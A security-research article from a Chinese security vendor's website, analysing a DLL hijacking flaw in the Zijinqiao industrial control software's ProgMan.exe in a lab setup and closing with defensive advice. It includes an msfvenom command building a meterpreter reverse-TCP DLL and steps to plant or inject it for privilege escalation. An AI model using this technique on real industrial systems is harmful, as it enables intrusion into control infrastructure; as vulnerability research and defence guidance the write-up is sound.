官網熱線:400-100-0298
      【安全研究】工控軟件dll劫持漏洞分析-為國家安全鍛矛鑄盾

      首頁

      產品體系

      解決方案

      案例精選

      新聞動態

      關于我們

      聯系我們

      安全服務

      資源中心

      返回上一層

      網絡靶場(博智安全總部)

      工業互聯網安全(博智數智)

      數據安全(博智密安)

      電子取證(上海臻相)

      返回上一層

      特種

      能源

      政府及事業單位

      教育

      智能制造

      其他

      安全服務

      新聞動態

      新聞動態

      所有內容 公司新聞 行業動態 招標模板 戰略動態

      【安全研究】工控軟件dll劫持漏洞分析

      時間:2022-01-14   訪問量:8658

      一、 概述

      工業控制軟件規模不斷擴大、復雜性不斷提高,工業控制系統自身的漏洞和攻擊面日益增大,本文針對一款工控軟件的dll劫持漏洞進行權限提升的研究。

      二、 環境準備

      a)工控組態軟件:紫金橋監控組態軟件 V6.5(官網下載中心有測試版可免費下載)

      b)靶機:winxp sp3 vm

       攻擊機:kali linux vm

      c)將紫金橋監控組態軟件 V6.5下載后并在靶機中安裝

      三、 尋找可劫持進程ProgMan.exedll

      a)開啟進程ProgMan.exe,用procexp.exe查看進程加載的dll

      b)與注冊表項進行對比

      c)可見ws2help.dll滿足dll劫持的要求,使用DLL_Hijacker.py生成源碼CPP文件


      d)將ws2help.cpp編譯生成ws2help.dll,然后放到ProgMan.exe的目錄下

      e)打開程序ProgMan.exe,DLL_Hijacker.py的彈窗信息代碼可根據自己的需求進行適當修改,本文對DLL_Hijacker.py彈窗信息代碼進行了修改,采用的彈窗信息為“Notice, you've been hacked!”

      四、 利用msf基于dll劫持實現權限提升

      a)開啟kali,利用msfvenom指令創建反彈shell的dll文件

      msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.180.146 LPORT=1234 -f dll >/root/ws2help.dll

      將生成的ws2help.dll拷貝至靶機:winxp sp3 vm

      b)利用Msf中的handler模塊開啟監聽

      c)在靶機中開啟進程ProgMan.exe,利用DllInject.exe,將ws2help.dll注入到進程,發現已提升權限

      五、 總結及防護建議

      本文針對工控軟件嘗試dll劫持漏洞的挖掘過程以及權限提升,演示了小漏洞如果利用得當也可以產生比較大的危害效果。本文整理了dll劫持的防御幾點方法如下:

      1.系統程序自檢

      用戶或系統管理員對系統內運行的所有進程排查,查看是否存dll劫持漏洞。如若發現可疑軟件,立即去軟件產商的官網中找查相關的補丁或升級版本。

      2.部署防護設備

      針對遠程DLL劫持漏洞的利用一定會有遠程加載DLL的過程,防護設備,如IPS在對網絡流量的檢測時,可以發現并阻斷此類可疑的加載,甚至根據用戶配置可以對所有DLL文件的直接傳輸進行告警或阻斷。

      3.程序加固

      防御DLL劫持的方法最好還是程序自己本身的加固,比如,在程序運行后,遍歷當前路徑下的dll,確認MD5和數字簽名安全后,再進行后續的加載。

      六、 參考鏈接

      本文借鑒了一些大牛的分享,相關參考鏈接如下:

      https://www.freebuf.com/articles/78807.html

      https://www.cnblogs.com/Yang34/p/12539346.html

      https://blog.csdn.net/m0_37552052/article/details/90287476

      http://www.h3c.com/CN/D_201110/727410_30008_0.htm

      【轉載聲明】本文屬于非攻研究院原創技術文章,已在FreeBuf發表https://www.freebuf.com/vuls/236934.html轉載請注明原始出處和作者。

      備案號碼:蘇ICP備12069441號
      網絡靶場(博智安全總部)

      博智安全教學實訓靶場

      博智安全比武競賽靶場

      博智安全紅藍對抗靶場

      博智安全試驗鑒定靶場

      博智安全應急處置靶場

      博智安全威脅誘捕系統

      博智安全自動化滲透攻擊系統

      工業互聯網安全(博智數智)

      博智工控防火墻

      博智工控主機衛士

      博智工控安全審計系統

      博智工業網絡蜜罐系統

      博智工控安全隔離網閘

      博智工控入侵檢測系統

      博智工控漏洞掃描系統

      博智工控漏洞挖掘平臺

      博智工業資產測繪與脆弱性評估系統

      博智安全配置核查系統

      博智工控信息安全風險評估系統

      博智工業安全管理平臺

      博智工控安全等級保護檢查工具箱

      博智工業互聯網安全應急處置工具箱

      博智安全態勢感知平臺

      數據安全(博智密安)

      博智微信保密檢查系統

      博智主機監控與審計系統

      博智計算機終端保密檢查系統

      博智身份鑒別系統

      博智惡意代碼輔助檢測系統

      博智專用運維管理系統

      博智存儲介質信息消除系統

      電子取證(上海臻相)

      臻相電子數據分析研判平臺

      臻相電勘寶電子數據智能勘查系統

      臻相電子證據固定工具

      臻相多通道硬盤復制系統

      電子數據取證工作站

      臻相電子書一體化取證桌

      臻相臨機密碼破解系統

      網絡靶場
      工業互聯網安全
      售后咨詢

      聯系我們

      公眾號
      TOP